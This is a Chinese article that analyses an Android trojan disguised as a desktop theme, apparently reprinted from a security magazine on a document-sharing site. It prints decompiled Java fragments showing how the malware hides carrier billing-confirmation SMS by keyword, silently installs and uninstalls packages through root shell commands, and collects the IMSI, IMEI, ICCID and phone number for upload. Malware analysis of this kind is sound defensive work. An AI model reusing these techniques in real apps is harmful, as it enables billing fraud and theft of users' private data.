Android木马分析与编写
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
Android 木马分析与编写
作者 mangel
一、 Android 木马介绍
Android 系统比iPhone 系统更开放,允许安装第三方应用程序,甚至是那些没有获得谷歌应用商店Android Market 批准的应用程序,但这种开放性似乎也增加了安全风险。Android Marke 本身也发现了恶意软件感染的应用程序,不过用户可以像在个人电脑上所做的那样,通过安装杀毒软件来加以防范。
二、 概述
该程序安装完是一款桌面主题,并可设置壁纸等。
运行后获取ROOT 权限,私自下载安装程序;并发送扣费短信,订制SP 服务,拦截掉回执的扣费确认短信,恶意消耗用户资费;窃取用户通讯录信息等隐私资料,并上传到服务器。
三、 样本特征
1. 敏感权限 黑 客防线 w w w .h a c k e r .c o m .c n 转载请注明出处 >
android.provider.Telephony.SMS_RECEIVED
2. 入口点和恶意模块
public class MyReceiver extends BroadcastReceiver{}
(1).发送拦截短信:
String str39 = "android.setting.SMS_SENT"; try
{
String str41 = arrayOfSmsMessage[i13].getOriginatingAddress(); SmsManager localSmsManager4 = localSmsManager1; ArrayList localArrayList7 = localArrayList2;
localSmsManager4.sendMultipartTextMessage(str41, null, localArrayList5, localArrayList7, null); }
if (!paramIntent.getAction().equals("android.provider.Telephony.SMS_RECEIVED")) if ((arrayOfSmsMessage[i13].getOriginatingAddress().contains("10658166")) || (arrayOfSmsMessage[i13].getMessageBody().contains("83589523")) || (arrayOfSmsMessage[i13].getMessageBody().contains("客服")) || (arrayOfSmsMessage[i13].getMessageBody().contains("资费")) || (arrayOfSmsMessage[i13].getMessageBody().contains("1.00元")) || (arrayOfSmsMessage[i13].getMessageBody().contains("2.00元")) || (arrayOfSmsMessage[i13].getMessageBody().contains("元/条")) || (arrayOfSmsMessage[i13].getMessageBody().contains("元/次"))) abortBroadcast();
(2). 获取ROOT 权限,安装卸载程序:
private void installApk(String paramString1, String paramString2)
try
{
Runtime localRuntime = Runtime.getRuntime();
StringBuilder localStringBuilder = new StringBuilder("sudo pm install -r ");
黑
客防线 w w w .h a c k
e r .c o m .c
n
转载请注明出处
File localFile2 = this.mContext.getFilesDir(); String str = localFile2 + "/" + paramString2; Process localProcess = localRuntime.exec(str); }
private void installAPK() private void uninstallPlugin() { try {
int i = Log.d("agui", "uninstall");
Process localProcess = Runtime.getRuntime().exec("pm uninstall -r com.newline.root"); Intent localIntent1 = new Intent("android.intent.action.RUN"); Context localContext = this.mContext;
Intent localIntent2 = localIntent1.setClass(localContext, MyService.class);
ComponentName localComponentName = this.mContext.startService(localIntent1); return;
}
(3).窃取上传隐私资料:
String str8 = Long.toString(System.currentTimeMillis()); Object localObject1 = localHashtable.put("id", str8); Object localObject2 = localHashtable.put("imsi", str4); Object localObject3 = localHashtable.put("imei", str5); Object localObject4 = localHashtable.put("iccid", str6); Object localObject5 = localHashtable.put("mobile", str7);
String str9 = TimeUtil.dateToString(new Date(), "yyyyMMddHHmmss"); Object localObject6 = localHashtable.put("ctime", str9); Object localObject7 = localHashtable.put("osver", "1");
Object localObject8 = localHashtable.put("cver", "010101"); Object localObject9 = localHashtable.put("uid", str1); Object localObject10 = localHashtable.put("bid", str2); Object localObject11 = localHashtable.put("pid", str3);
Object localObject12 = localHashtable.put("softid", paramString2);
MessageService.4 local4 = new MessageService.4(this, paramIResponseListener); NetTask localNetTask = new NetTask(localHashtable, "utf-8", 0, local4); String[] arrayOfString = new String[1]; arrayOfString[0] = paramString1;
AsyncTask localAsyncTask = localNetTask.execute(arrayOfString);
public class NetTask extends AsyncTask
String str5 = localStringBuffer1.toString();
黑
客防线 w w w .h a c k
e r .c o m .c
n
转载请注明出处